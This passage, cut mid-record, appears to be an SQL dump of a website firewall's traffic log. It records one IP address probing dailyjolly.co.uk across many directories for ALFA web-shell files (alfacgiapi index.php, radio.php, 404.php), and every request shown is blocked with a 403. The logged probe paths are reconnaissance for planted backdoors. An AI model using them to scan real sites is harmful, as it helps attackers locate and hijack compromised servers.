Safari\\/537.36\"}','Ni024aP6oIhSpc7zRG5YfvmW',0,1674474263.1891,174,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/.well-known/acme-challenge/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','ULeDAgz0WFG4fP8RtkKmTpNO',0,1674474268.2926,243,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/.well-known/acme-challenge/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','QR7gTMU635DPS8xaybuJwIc1',0,1674474268.7376,217,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/.well-known/acme-challenge/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','8HvcgCz6LKm4iBAuXRkIN5Mn',0,1674474269.2152,223,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/.well-known/pki-validation/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','BcJNbE8dUiQsltyvYeS0G3Fh',0,1674474276.4642,215,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/.well-known/pki-validation/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','0nZXaP8u47OojNybUFmlvgkL',0,1674474277.0875,217,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/.well-known/pki-validation/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','ApJGzhXNCW4PLFbU7naHr8KO',0,1674474277.5376,170,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/.well-known/pki-validation/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','i9RL1keaSwgNT2bjUfn8E5qK',0,1674474281.3278,193,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/.well-known/pki-validation/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','KfLdRQv1mrwa06AXOI8VUbFi',0,1674474281.7332,171,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/.well-known/pki-validation/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','fT9CyBDXQbcn0oE3RkF45INS',0,1674474282.1091,193,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/.tmb/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','Psio03DyANwpeHLSQ5krfl94',0,1674474285.7625,173,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/.tmb/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','ecrSDOA5QXpU84Ptmzyf0lLJ',0,1674474286.1670,263,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/.tmb/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','c6PoyQ8HmBZbRSFvnwzdNAD1',0,1674474286.6641,158,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/.tmb/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','NiQGKWHSX43JLOfqRehlkB0t',0,1674474290.7780,187,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/.tmb/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','gnkzJPM4YEZf5mRUFQh7cAuv',0,1674474291.1640,211,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/.tmb/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','zgfAuoZJRbkXFNCLBQ2wpe1n',0,1674474291.6092,179,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/.quarantine/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','H9q1kD7zSfKO6YM2bEBCRrdU',0,1674474297.6008,178,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/.quarantine/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','CM4KGFEPpsU7TVIye1rbhcWB',0,1674474297.9903,227,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/.quarantine/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','DFCyEPeau65YwAgS1mjzIbsv',0,1674474298.4722,168,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/.quarantine/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','wtY0Ah4Jdi8uKmWOG5QknSXL',0,1674474302.2303,166,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/.quarantine/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','P8dVeHOgSlspNT93jqJhxm24',0,1674474302.5870,164,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/.quarantine/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','Lgp1OXHldeNJ54PTMSj7FoAy',0,1674474302.9394,182,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/cgi-bin/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','8qJmsG91UYNTWawtokyAzQpZ',0,1674474309.3459,185,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/cgi-bin/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','63Tqov0O8MmaGLlkj9W7SXdh',0,1674474309.7092,194,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/cgi-bin/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','O9jtZKnxCTiaQ8s63qzN0BLm',0,1674474310.0865,166,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/cgi-bin/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','IN8xrXmchn2SEOGaKRUAbgwv',0,1674474313.4770,217,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/cgi-bin/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','lOVsC3jW0EwPFH8Yndfzu7hv',0,1674474313.8893,163,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/cgi-bin/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','JAz2Lkcp8NdCM7vnqBuUx13H',0,1674474314.2309,156,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/images/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','mfJp47yntwKNLGzdSWxlQTFI',0,1674474318.0407,241,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/images/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','THWPt5wspQvA91FGRxSoek8a',0,1674474318.4644,179,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/images/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','01cgPnTVBZN8hvedEJYKuiI6',0,1674474318.8208,192,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/images/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','g4MBz1wUn5yA67lOIuv8CxEp',0,1674474322.3770,174,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/images/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','WFckPSOwqxJfdNHTCmX23orM',0,1674474322.7420,175,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/images/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','GtgrmHu5P9JZfdR2yDVYs8Wq',0,1674474323.0929,210,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/components/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','AXvRGeQF9ghbtmyHZWUEkV1L',0,1674474326.6023,191,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/components/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','xJzuqkQ2Rr1N9YUa65I8gTLO',0,1674474326.9793,170,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/components/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','TaYtq7zKAZf19dPV5OsB3u0S',0,1674474327.3515,189,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/components/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','Llf7I9wWmSv8pu6jXV0RhUJY',0,1674474330.9595,197,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/components/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','8vsGjSDa5Lb7ChgBPefQlWNO',0,1674474331.3278,196,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/components/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','vwc7ob80aAud35BnXzRN6fmG',0,1674474331.9795,236,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wordpress/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','h7gOApHCqvUQMmIW5Verjkza',0,1674474335.6070,222,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wordpress/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','fpXoKcjW5nSBdUzx2yAbleTt',0,1674474336.0025,174,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wordpress/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','G6sjBIyxX2ONq7Yd1ipUlmQ5',0,1674474336.3597,230,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wordpress/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','WK79uiDMZCF3cGLYhpqkVvQ6',0,1674474339.9465,165,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wordpress/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','WvcXS6rlRfEhMP1aK0tsJmUI',0,1674474340.3018,192,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wordpress/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','YwRPU3mMSncATJ0GOfQdtDVL',0,1674474340.6704,180,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','WBFMyzJ72muTLrSj1gxwEs5v',0,1674474344.1048,228,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','g3RbJzPu6qsOYrhdWMBQfy9t',0,1674474344.5127,192,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','XxBb8WvnRcjrqf5GdQzgHi4P',0,1674474344.8871,200,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','iM0tAEzUw6CW1jk7foZPdT8G',0,1674474348.3448,198,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','aRBXofscKpudAChMOmZHJ3ES',0,1674474348.7215,194,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','pUZiTBQq5yDEm2sVvcwRgYLG',0,1674474349.0964,168,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/blog/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','z4fZ1UDP6srKm5HvqAkTScyE',0,1674474352.4086,216,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/blog/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','VR0cx527lTzm93iHKCSg4ErM',0,1674474352.8015,158,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/blog/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','NBhQ0drqvg37YAx2SCHiuZJw',0,1674474353.1360,164,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/blog/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','wBWfd9UtJaMvuSyzCNYbrj8l',0,1674474356.4572,157,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/blog/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','Unw7TPtCXhgIF9LH8aVjBcW0',0,1674474356.7949,171,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/blog/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','1K7ajVSZIduDoQP3pbzynrfs',0,1674474357.1433,171,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/new/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','aDckJfQT7G8xb2ziV0ruIAWy',0,1674474360.5497,176,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/new/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','v6bRx7OKwLVTYka30dXprjI1',0,1674474360.9252,172,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/new/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','0gWpP8kT1zIqAoN4s9uOZ7UB',0,1674474361.3041,186,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/new/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro 